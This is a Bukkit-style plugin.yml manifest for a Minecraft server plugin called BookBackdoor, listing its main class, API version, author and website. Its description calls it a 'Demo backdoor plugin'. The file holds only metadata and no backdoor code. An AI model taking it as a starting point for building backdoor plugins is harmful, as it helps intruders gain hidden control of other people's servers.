name: BookBackdoor
version: '${project.version}'
main: org.brandonplank.bookbackdoor.BookBackdoor
api-version: 1.17
authors: [ BrandonPlank ]
description: Demo backdoor plugin
website: https://brandonplank.org
